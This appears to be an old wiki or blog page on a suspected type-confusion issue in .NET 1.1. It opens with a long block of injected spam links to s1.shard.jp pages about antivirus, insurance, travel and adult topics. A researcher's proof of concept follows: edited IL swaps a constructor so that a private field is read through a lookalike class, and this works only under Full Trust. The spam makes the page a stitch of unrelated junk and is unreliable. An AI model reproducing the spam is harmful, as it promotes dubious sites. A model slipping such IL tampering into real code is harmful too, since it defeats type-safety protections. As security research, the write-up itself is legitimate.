Possible Type Confusion issue in .Net 1.1 (only works in Full Trust)

[http://s1.shard.jp/olharder/agencias-auto.html automatic bread maker recipies ] webmap african american equality reform [http://s1.shard.jp/galeach/new83.html asiaworld expo ] [http://s1.shard.jp/frhorton/78vbl98c2.html african hut ] [http://s1.shard.jp/bireba/symantec-antivirus.html pandaantivirusonline ] http [http://s1.shard.jp/losaul/wwe-wrestlemania.html gio insurance western australia ] [http://s1.shard.jp/galeach/new183.html asian drama torrent ] [http://s1.shard.jp/losaul/australia-airfare.html australia nsw public holidays ] [http://s1.shard.jp/bireba/alertas-antivirus.html avgfreeantivirus ] [http://s1.shard.jp/galeach/new26.html hustler asian fever ] australia butt hinge in s [http://s1.shard.jp/frhorton/c1k98s3rt.html poems written by african american authors ] [http://s1.shard.jp/frhorton/lt8tyfnvp.html african american romantic poetry ] [http://s1.shard.jp/galeach/new22.html thick legs asian ] [http://s1.shard.jp/olharder/automation-expense.html automotive corp finance household ] [http://s1.shard.jp/olharder/collective-unconscious.html auto holts sales ] [http://s1.shard.jp/olharder/map.html ricciardi auto sales ] [http://s1.shard.jp/frhorton/dfj31yuuh.html pure african shea butter ] [http://s1.shard.jp/olharder/anderson-autopsy.html windows 2000 reboots automatically ] http [http://s1.shard.jp/bireba/symantec-antivirus.html desinstalar norton antivirus ] [http://s1.shard.jp/frhorton/gpeqnwwus.html african ancestors ] [http://s1.shard.jp/galeach/new193.html asia central country ] [http://s1.shard.jp/frhorton/xodsctsq6.html african brides.com ] [http://s1.shard.jp/losaul/job-agencies-sydney.html retrovision australia ] [http://s1.shard.jp/losaul/australian-citizenship.html australia insurance mortgage ] [http://s1.shard.jp/bireba/cheap-norton-antivirus.html macafee antivirus free download ] stinger antivirus download free panda titanium antivirus 2005 4.02.01 username [http://s1.shard.jp/galeach/new115.html asiamail.com garcia ] [http://s1.shard.jp/olharder/300m-auto.html auto loans reciprocal link ] [http://s1.shard.jp/frhorton/whhjm2ac8.html african american dermatologists in nyc ] red blood cell aplasia [http://s1.shard.jp/losaul/car-importers-australia.html car rental newcastle australia ] [http://s1.shard.jp/losaul/real-estate-western.html world challenge expeditions australia ] [http://s1.shard.jp/frhorton/54k2pi876.html africa united concert ] [http://s1.shard.jp/frhorton/qogtjly72.html inyati south africa ] domain [http://s1.shard.jp/olharder/internet-auto-part.html autodialer software ] [http://s1.shard.jp/galeach/new85.html asian ladyboy picture sak ] [http://s1.shard.jp/bireba/review-zone-alarm.html trend antivirus scan ] [http://s1.shard.jp/frhorton/xntk9qgnd.html south african songs ] [http://s1.shard.jp/olharder/autoextracom.html peoria illinois auto detailing ] [http://s1.shard.jp/galeach/new37.html pauli and motos and asian and bistro ] [http://s1.shard.jp/frhorton/zgxfpsa75.html henry africas ] [http://s1.shard.jp/losaul/time-difference.html australian home builders ] [http://s1.shard.jp/bireba/norton-antivirus.html avg antivirus definition download ] [http://s1.shard.jp/frhorton/9nls8flts.html auction south africa ] [http://s1.shard.jp/galeach/new100.html tsunami diaster in asia ] [http://s1.shard.jp/losaul/the-australian.html road maps new south wales australia ] [http://s1.shard.jp/olharder/44-auto-trader-nz.html tokyo auto show mitsubishi ] [http://s1.shard.jp/olharder/auto-bill-fitts.html what is comprehensive auto insurance coverage ] [http://s1.shard.jp/bireba/notron-antivirus.html nortan antivirus 2005 download ] car hire brisbane airport australia [http://s1.shard.jp/galeach/new136.html barrino fantasia lyric ] [http://s1.shard.jp/losaul/centacare-australia.html company sponsorship australia ] [http://s1.shard.jp/galeach/new41.html milk and cerial asian version ] norton antivirus live update error [http://s1.shard.jp/bireba/symantec-antivirus.html avgfreeantivirus ] [http://s1.shard.jp/frhorton/tyyykyebz.html africa aids in keep spreading why ] [http://s1.shard.jp/bireba/norton-antivirus.html e trust antivirus free download ] [http://s1.shard.jp/bireba/symantec-antivirus.html mc affee antivirus ] murrays buses australia [http://s1.shard.jp/galeach/new87.html abbyy asia brand capture product recognition server ] [http://s1.shard.jp/losaul/ash-australia.html people to people australia 2005 ] [http://s1.shard.jp/losaul/aborigines--dreamtime.html australia telephone directory online ] [http://s1.shard.jp/frhorton/po4uhk6ve.html mintys south africa ] top mac antivirus free [http://s1.shard.jp/frhorton/3o7l9jema.html african bubble butt ] [http://s1.shard.jp/olharder/auto-el-loan.html chicago area auto molding parts store ] [http://s1.shard.jp/galeach/new47.html angiodisplasia ] top [http://s1.shard.jp/bireba/panda-software.html giant antivirus software ] [http://s1.shard.jp/galeach/new139.html asian store in maryland ] [http://s1.shard.jp/frhorton/ds9o5dtz4.html africaine peinture ] [http://s1.shard.jp/frhorton/sofu2962u.html african braided hair ] [http://s1.shard.jp/bireba/antivirus-cleanup.html what is antivirus program ] [http://s1.shard.jp/losaul/yamaha-motorcycle.html cork flooring australia ] [http://s1.shard.jp/olharder/automotive-training.html autocontrol three.1 ] [http://s1.shard.jp/losaul/the-barrier-reef.html australian railway historical society nsw ] [http://s1.shard.jp/frhorton/j45p2foyu.html rainy season in africa ] [http://s1.shard.jp/bireba/stinger-antivirus.html english updates for norton antivirus virus defenitions ] [http://s1.shard.jp/frhorton/4klamxahb.html aids percentage africa ] [http://s1.shard.jp/losaul/australian-motorsportbiz.html ian potter centre australia ] [http://s1.shard.jp/bireba/top-antivirus.html symantac antivirus update ] [http://s1.shard.jp/galeach/new33.html asia girls.com ] [http://s1.shard.jp/olharder/cheap-auto-insurance.html 27 auto become br br break line poker tag ] [http://s1.shard.jp/galeach/new138.html asian american basketball league ] [http://s1.shard.jp/frhorton/9rxlvcl6n.html etv news south africa ] map [http://s1.shard.jp/olharder/autoextracom.html johns auto sales inc ] [http://s1.shard.jp/olharder/automobile-bmw.html auto bc trader vancouver ] http://www.textriccnaracac.com while doing my Rooting the CLR research I found something which I thing could be a 'Type Confusion issue' in .Net 1.1 (see more details about these issues in this great document on Java Security published by the LSD Research group http://lsd-pl.net/papers.html#java)

Here are my test:

1) Compile this:

using System; namespace RootingTheClr {   class classTest {       public static void Main {           Console.WriteLine("\n\n classTest \n\n"); normalClass ncTest = new normalClass; maliciousClass mcTest = (maliciousClass)new maliciousClass; normalClass ncTestTarget = ncTest; Console.WriteLine("Public = " + mcTest.iPublicVar + "   Private = " + mcTest.iPrivateVar ); }   }

class normalClass {       public int iPublicVar; private int iPrivateVar;

public normalClass {           iPrivateVar = 100; iPublicVar = 999; }   }

class maliciousClass {       public int iPublicVar; public int iPrivateVar;

public maliciousClass {           iPrivateVar = 1; iPublicVar = 9; }   } }

2) and you should get this (note the value of Private):

csc classtest.cs Microsoft (R) Visual C# .NET Compiler version 7.10.3052.4 for Microsoft (R) .NET Framework version 1.1.4322 Copyright (C) Microsoft Corporation 2001-2002. All rights reserved.

classTest.cs(21,15): warning CS0169: The private field 'RootingTheClr.normalClass.iPrivateVar' is never used

classTest.exe

classTest

Public = 9   Private = 1

3) run ILDASM on the exe:

ildasm classTest.exe /out:classTest.il

// WARNING: Created Win32 resource file classTest.res

4) Notepad it and make this change:

notepad classTest.il

replace

IL_0010: newobj     instance void RootingTheClr.maliciousClass::.ctor

with

IL_0010: newobj     instance void RootingTheClr.normalClass::.ctor

5) Ilasm the file

ilasm classTest.il

Microsoft (R) .NET Framework IL Assembler. Version 1.1.4322.573 Copyright (C) Microsoft Corporation 1998-2002. All rights reserved. Assembling 'classTest.il', no listing file, to EXE --> 'classTest.EXE' Source file is ANSI

Assembled method classTest::Main Assembled method classTest::.ctor Assembled method normalClass::.ctor Assembled method maliciousClass::.ctor Creating PE file

Emitting members: Global Class 1 Methods: 2; Class 2 Fields: 2;     Methods: 1; Class 3 Fields: 2;     Methods: 1; Resolving member refs: 8 -> 8 defs, 0 refs Writing PE file Operation completed successfully 6) execute it (note the value of Private) classTest.exe

classTest

Public = 999   Private = 100

7) This means that we successuflly were able to cast an object of the class normalClass into an object of the class maliciousClass. The attack vector occours because iPrivateVar is a pubic var in maliciousClass and a private var in normalClass

class maliciousClass {       public int iPublicVar; public int iPrivateVar;

...

class normalClass {       public int iPublicVar; private int iPrivateVar;

...

-


 * 8) what is interresting is that this only works in Full Trust, if you try to run this in a partial trust environment like from a local network share) you will get the following error:

classTest.exe

Unhandled Exception: System.Security.VerificationException: Operation could destabilize the runtime. at RootingTheClr.classTest.Main

This means that the CLR in partial trust does do some verification on the compliled Byte code which is not done in Full Trust (which will mean that Microsoft Security Response Team will say that this is not a vulnerabiltiy and occours by design :)